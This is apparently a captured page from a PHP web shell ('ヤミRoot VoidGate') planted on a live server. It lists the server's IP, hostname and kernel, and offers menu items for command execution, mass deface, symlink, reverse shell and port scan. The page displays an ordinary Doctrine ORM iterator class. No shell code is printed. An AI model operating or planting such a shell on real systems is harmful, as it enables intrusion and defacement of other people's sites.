ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
doctrine
/
orm
/
lib
/
Doctrine
/
ORM
/
Query
/
Viewing: TreeWalkerChainIterator.php
<?php declare(strict_types=1); namespace Doctrine\ORM\Query; use ArrayAccess; use Doctrine\Deprecations\Deprecation; use Doctrine\ORM\AbstractQuery; use Iterator; use ReturnTypeWillChange; use function key; use function next; use function reset; /** * @deprecated This class will be removed in 3.0 without replacement. * * @template-implements Iterator<TreeWalker> * @template-implements ArrayAccess<int, TreeWalker> */ class TreeWalkerChainIterator implements Iterator, ArrayAccess { /** @var class-string<TreeWalker>[] */ private $walkers = []; /** @var TreeWalkerChain */ private $treeWalkerChain; /** @var AbstractQuery */ private $query; /** @var ParserResult */ private $parserResult; /** * @param AbstractQuery $query * @param ParserResult $parserResult */ public function __construct(TreeWalkerChain $treeWalkerChain, $query, $parserResult) { Deprecation::trigger( 'doctrine/orm', 'https://github.com/doctrine/orm/pull/9511', '%s is deprecated and will be removed without replacement.', self::class ); $this->treeWalkerChain = $treeWalkerChain; $this->query = $query; $this->parserResult = $parserResult; } /** * @return string|false * @psalm-return class-string<TreeWalker>|false */ #[ReturnTypeWillChange] public function rewind() { return reset($this->walkers); } /** @return TreeWalker|null */ #[ReturnTypeWillChange] public function current() { return $this->offsetGet(key($this->walkers)); } /** @return int */ #[ReturnTypeWillChange] public function key() { return key($this->walkers); } /** @return TreeWalker|null */ #[ReturnTypeWillChange] public function next() { next($this->walkers); return $this->offsetGet(key($this->walkers)); } /** * {@inheritDoc} * * @return bool */ #[ReturnTypeWillChange] public function valid() { return key($this->walkers) !== null; } /** * @param mixed $offset * @psalm-param array-key|null $offset * * @return bool */ #[ReturnTypeWillChange] public function offsetExists($offset) { return isset($this->walkers[$offset ?? '']); } /** * @param mixed $offset * @psalm-param array-key|null $offset * * @return TreeWalker|null */ #[ReturnTypeWillChange] public function offsetGet($offset) { if ($this->offsetExists($offset)) { return new $this->walkers[$offset]( $this->query, $this->parserResult, $this->treeWalkerChain->getQueryComponents() ); } return null; } /** * {@inheritDoc} * * @param string $value * @psalm-param array-key|null $offset * * @return void */ #[ReturnTypeWillChange] public function offsetSet($offset, $value) { if ($offset === null) { $this->walkers[] = $value; } else { $this->walkers[$offset] = $value; } } /** * @param mixed $offset * @psalm-param array-key|null $offset * * @return void */ #[ReturnTypeWillChange] public function offsetUnset($offset) { if ($this->offsetExists($offset)) { unset($this->walkers[$offset ?? '']); } } }
Coded With 💗 by
0x6ick